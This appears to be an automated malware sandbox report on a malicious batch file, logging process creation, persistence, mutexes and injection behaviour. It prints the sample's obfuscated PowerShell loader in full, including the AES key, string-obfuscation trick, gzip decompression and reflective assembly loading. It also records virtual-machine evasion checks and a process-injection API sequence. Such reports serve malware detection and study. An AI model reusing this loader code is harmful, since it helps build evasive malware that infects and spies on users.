Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,40_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E991752C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,41_2_000002E991752C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-1ktMxXBv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_sbacdivv.ibu.ps1
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000001B4448A23F020_3_000001B4448A23F0
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000001B4448ACC9420_3_000001B4448ACC94
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000001B4448ACE1820_3_000001B4448ACE18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B444902FF020_2_000001B444902FF0
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490D89420_2_000001B44490D894
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490DA1820_2_000001B44490DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10F63E38_2_00007FFB4B10F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10DD5838_2_00007FFB4B10DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10640D38_2_00007FFB4B10640D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B104C4D38_2_00007FFB4B104C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10DC3538_2_00007FFB4B10DC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B103AF138_2_00007FFB4B103AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10E32938_2_00007FFB4B10E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10FDE938_2_00007FFB4B10FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B10F65938_2_00007FFB4B10F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B38842A38_2_00007FFB4B38842A
Source: C:\Windows\System32\conhost.exeCode function: 39_3_000001FE3A94CC9439_3_000001FE3A94CC94
Source: C:\Windows\System32\conhost.exeCode function: 39_3_000001FE3A94CE1839_3_000001FE3A94CE18
Source: C:\Windows\System32\conhost.exeCode function: 39_3_000001FE3A9423F039_3_000001FE3A9423F0
Source: C:\Windows\System32\dllhost.exeCode function: 40_3_000001C03F6E23F040_3_000001C03F6E23F0
Source: C:\Windows\System32\dllhost.exeCode function: 40_3_000001C03F6ECC9440_3_000001C03F6ECC94
Source: C:\Windows\System32\dllhost.exeCode function: 40_3_000001C03F6ECE1840_3_000001C03F6ECE18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140001CF040_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140002D4C40_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000000014000320440_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000000014000243440_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000000014000127440_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CDA1840_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401C2FF040_2_000001C0401C2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CD89440_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FDA1840_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401F2FF040_2_000001C0401F2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FD89440_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exeCode function: 41_3_000002E99172CE1841_3_000002E99172CE18
Source: C:\Windows\System32\winlogon.exeCode function: 41_3_000002E9917223F041_3_000002E9917223F0
Source: C:\Windows\System32\winlogon.exeCode function: 41_3_000002E99172CC9441_3_000002E99172CC94
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E991752FF041_2_000002E991752FF0
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175D89441_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175DA1841_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E991782FF041_2_000002E991782FF0
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178D89441_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178DA1841_2_000002E99178DA18
Source: C:\Windows\System32\lsass.exeCode function: 42_3_00000213BDCBCC9442_3_00000213BDCBCC94
Source: C:\Windows\System32\lsass.exeCode function: 42_3_00000213BDCB23F042_3_00000213BDCB23F0
Source: C:\Windows\System32\lsass.exeCode function: 42_3_00000213BDCBCE1842_3_00000213BDCBCE18
Source: C:\Windows\System32\svchost.exeCode function: 43_3_00000158709A23F043_3_00000158709A23F0
Source: C:\Windows\System32\svchost.exeCode function: 43_3_00000158709ACC9443_3_00000158709ACC94
Source: C:\Windows\System32\svchost.exeCode function: 43_3_00000158709ACE1843_3_00000158709ACE18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709D2FF043_2_00000158709D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DD89443_2_00000158709DD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DDA1843_2_00000158709DDA18
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB163CE1844_3_0000026DB163CE18
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB16323F044_3_0000026DB16323F0
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB163CC9444_3_0000026DB163CC94
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB160CE1844_3_0000026DB160CE18
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB16023F044_3_0000026DB16023F0
Source: C:\Windows\System32\dwm.exeCode function: 44_3_0000026DB160CC9444_3_0000026DB160CC94
Source: C:\Windows\System32\svchost.exeCode function: 45_3_000002A3EFFCCE1845_3_000002A3EFFCCE18
Source: C:\Windows\System32\svchost.exeCode function: 45_3_000002A3EFFCCC9445_3_000002A3EFFCCC94
Source: C:\Windows\System32\svchost.exeCode function: 45_3_000002A3EFFC23F045_3_000002A3EFFC23F0
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F0662FF045_2_000002A3F0662FF0
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066D89445_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066DA1845_2_000002A3F066DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2679
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: unknownProcess created: Commandline size = 5684
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2679Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682Jump to behavior
Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.spyw.evad.winCMD@54/91@2/2
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,40_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,37_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 37_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,37_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\9590544
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7080
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\942558
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7720
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\3288062
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3xmlhmq.zg3.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: WMIC.exe, 00000017.00000003.1695574272.000002A260EAD000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000002.1698169437.000002A260EB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000003.1697303203.000002A260EB0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000017.00000003.1696954523.000002A260EAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Manufacturer, Model FROM Win32_DiskDrive;
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
